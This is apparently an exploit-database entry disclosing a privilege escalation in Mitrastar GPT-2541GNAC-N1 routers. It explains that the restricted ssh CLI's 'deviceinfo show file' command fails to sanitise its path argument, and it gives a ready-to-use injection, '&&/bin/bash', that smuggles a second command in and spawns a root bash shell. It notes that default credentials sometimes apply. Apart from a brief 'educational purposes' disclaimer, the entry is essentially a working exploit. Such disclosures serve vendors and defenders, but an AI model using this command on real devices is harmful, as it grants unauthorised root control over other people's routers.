Exploits / Vulnerability Discovered : 2021-09-29 |
Type : remote |
Platform : hardware
This exploit / vulnerability Mitrastar gpt2541gnacn1 privilege escalation is for educational purposes only and if it is used you will do on your own risk!
# Mitrastar GPT-2541GNAC-N1 devices are provided with access through ssh into a restricted default shell (credentials are on the back of the router and in some cases this routers use default credentials).
# The command “deviceinfo show file <path>” is used from reduced CLI to show files and directories. Because this command do not handle correctly special characters, is possible to insert a second command as a parameter on the <path> value. By using “&&/bin/bash” as parameter value we can spawn a bash console, as seen on the next example:
Exploit:
--------
> deviceinfo show file &&/bin/bash
# This command will spawn a full interoperable bash console with root privileges.